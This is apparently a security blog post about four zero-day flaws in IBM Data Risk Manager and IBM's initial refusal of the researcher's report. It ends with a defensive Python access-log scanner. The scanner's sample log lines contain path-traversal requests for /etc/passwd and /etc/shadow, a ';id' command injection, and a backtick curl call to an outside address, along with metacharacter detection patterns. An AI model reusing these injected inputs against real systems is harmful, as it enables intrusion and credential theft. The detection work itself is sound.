Four zero-day vulnerabilities were discovered in IBM’s Data Risk Manager (IDRM). The vulnerabilities themselves are concerning, but IBM’s response when they were reported is more so: the company simply stated that the report was “out of scope”, meaning it had no intention of rectifying or even addressing the issue.
Pedro Ribeiro, Research Director at Agile Information Security, published his findings on GitHub after IBM refused to accept his report. The bugs directly affect IBM’s vulnerability management platform in four major ways that allow for:
These vulnerabilities in IDRM are especially troubling because of the reach IDRM has across the entire network: it holds credentials for other tools, and it records the specific vulnerabilities the enterprise is currently exposed to. Exploiting any one of the four opens a door into the enterprise and leaves it more susceptible to follow-on attacks. Chained together, they give a remote attacker full access as root, so compromising this one appliance can cascade through the security tooling that depends on it. So why, if these vulnerabilities are so serious, did IBM refuse to patch them?
Ribeiro disclosed the four vulnerabilities to IBM as part of the organization’s bug disclosure program. In response to his advisory, IBM gave Ribeiro the following response:
“We have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for “enhanced” support paid for by our customers. This is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within 6 months prior to submitting a report.”
Oddly, IBM initially refused a detailed vulnerability report from a reputable research firm. Its response raises more questions than it answers and does not address any of Ribeiro’s findings. Because IBM showed no interest in moving forward, Ribeiro published his findings on GitHub to make the vulnerabilities known to the public. Why would one of the largest technology companies in the world not only refuse to act but knowingly leave its customers exposed?
Initially, IBM admitted only to several flaws within IDRM and denied any major vulnerabilities. Since then, IBM has reversed its position, acknowledging that three of the vulnerabilities exist. In a follow-up email to ZDNet, IBM called the incident “a process error that resulted in an improper response to the researcher who reported this situation to IBM.” IBM has also stated that it will release a patch addressing the vulnerabilities, mitigation tips, and a security advisory as a follow-up to the event. Regardless of IBM’s revised response, it still raises the question: why did IBM not accept Ribeiro’s assessment and move to fix the problem right away? Only after Ribeiro published his findings on GitHub did IBM do anything.
While the circumstances seem unusual, IBM is now taking steps to address the problem. Still, Ribeiro’s report should have been taken seriously from the beginning, not casually dismissed. Zero-day vulnerabilities of this scale, which allow a complete remote takeover of the appliance and through it a foothold in the network, are an extreme security risk to any enterprise. More troubling is that these vulnerabilities originate with IBM, which should know both to act as soon as possible in these situations and to do so with its customers’ safety in mind. IBM currently has a single patch that addresses the arbitrary file download and command injection vulnerabilities. Anyone running IDRM should apply it immediately, restrict network access to the appliance to the administrators and systems that genuinely need it, and watch its logs closely for anything suspicious until IBM’s full patch covering the remaining vulnerabilities goes live.
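The advice above to watch the appliance’s logs is only useful with something concrete to look for. The following is an added example, written for this page and not taken from IBM, Agile Information Security or Ribeiro’s advisory: a small scanner that reads web access-log lines in the common “combined” format and flags the two bug classes this page names, arbitrary file download (path traversal in a parameter) and command injection (shell metacharacters in a parameter). The sample log lines, client addresses, paths and parameter names are constructed for the example and are not IDRM endpoints; the regular expressions are heuristics a practitioner would tune to the product’s real parameter names.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines in the "combined" format. Addresses,
# paths and parameter names are made up for this example; they are not IDRM
# endpoints and nothing here is taken from the published advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2020:10:01:02 +0000] "GET /app/report?id=42 HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Apr/2020:10:01:07 +0000] "GET /app/download?file=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.68.0"
203.0.113.9 - - [21/Apr/2020:10:01:09 +0000] "GET /app/download?file=..%252F..%252F..%252Fetc%252Fshadow HTTP/1.1" 403 120 "-" "curl/7.68.0"
203.0.113.9 - - [21/Apr/2020:10:01:15 +0000] "GET /app/tool?host=127.0.0.1;id HTTP/1.1" 200 310 "-" "python-requests/2.23"
203.0.113.9 - - [21/Apr/2020:10:01:18 +0000] "GET /app/tool?host=127.0.0.1%60curl%20http%3A%2F%2F198.51.100.7%2Fx%60 HTTP/1.1" 500 0 "-" "python-requests/2.23"
10.0.0.7 - - [21/Apr/2020:10:02:00 +0000] "GET /app/search?q=quarterly+report HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) '
)

# Heuristics for the two bug classes named on this page, applied to the fully
# decoded parameter value so URL-encoding tricks do not hide the payload.
CHECKS = {
    "path_traversal": re.compile(r"\.\.[/\\]|^/(?:etc|proc|root)/"),
    "command_injection": re.compile(r"[;`|]|&&|\$\(|\n"),
}


def decode_deep(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads such as
    %252e%252e%252f are examined in their final form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(target: str):
    """Yield (name, decoded value) pairs from the request target's query string.
    The query is split on '&' only: parse_qsl is avoided because older Python
    versions also split on ';', which would hide a ';'-based injection."""
    query = urlsplit(target).query
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        yield unquote(name), decode_deep(raw.replace("+", " "))


def analyze_line(line: str) -> list:
    """Return one finding per (parameter, bug class) match on a single log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for name, value in query_params(m.group("target")):
        for kind, pattern in CHECKS.items():
            if pattern.search(value):
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": int(m.group("status")),
                    "param": name,
                    "value": value,
                    "kind": kind,
                })
    return findings


def scan_log(text: str) -> list:
    """Scan a whole log and return all findings in log order."""
    return [f for line in text.splitlines() for f in analyze_line(line)]


def successful(findings: list) -> list:
    """Findings the server answered with 200: the requests to treat as a
    probable compromise rather than a failed probe."""
    return [f for f in findings if f["status"] == 200]


def offenders(findings: list) -> Counter:
    """Count findings per source address to prioritise blocking and triage."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['ip']} {f['kind']} {f['param']}={f['value']!r} status={f['status']}")
    print("per-source counts:", dict(offenders(hits)))
    print("answered 200:", len(successful(hits)))
```

Two design points matter in practice. Decoding is done repeatedly and bounded, because a single `unquote` leaves `%252F` as `%2F` and the traversal check would miss it; and the status code is kept with each finding, since a traversal request that returned 200 is a likely data leak while a 403 or 500 is more probably a failed probe, and the two deserve different responses. The metacharacter check will occasionally flag legitimate input containing `|`, so tune it against the parameters the appliance actually accepts before alerting on it.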